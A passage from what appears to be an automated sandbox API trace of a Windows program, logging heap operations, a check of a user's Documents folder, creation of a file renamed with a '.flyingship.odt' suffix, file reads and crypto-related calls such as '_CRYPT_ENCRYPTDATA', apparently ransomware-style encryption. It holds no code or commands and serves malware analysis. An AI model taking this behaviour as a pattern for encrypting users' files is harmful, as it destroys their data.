Size=0x10) returned 0x9ba420 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0177.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0177.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0177.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0177.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0177.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0177.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0177.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0177.996] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf")) returned 0x10 [0177.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0177.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0177.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0177.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0177.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0177.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.flyingship.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\gvoasfhilqm4y.flyingship.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0177.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0177.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0177.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0177.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.998] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0177.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0177.998] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0177.998] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0177.998] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0177.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0177.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0177.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0177.999] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0177.999] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x58fc, lpOverlapped=0x0) returned 1 [0178.002] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0178.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0178.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x58fc) returned 0x900470 [0178.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0178.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0178.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0178.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0178.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x58fc) returned 0xbea018 [0178.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900470 | out: hHeap=0x8a0000) returned 1 [0178.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.003] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0178.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x58fc) returned 0x900470 [0178.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900470 | out: hHeap=0x8a0000) returned 1 [0178.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0178.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0178.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.004] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0178.004] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.004] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0178.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x58fc) returned 0x900470 [0178.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0178.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0178.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x58fc) returned 0xbef920 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0178.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.006] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0178.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0178.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0178.006] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0178.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0178.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0178.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.007] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0178.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0178.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0178.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.007] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0178.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.008] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0178.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 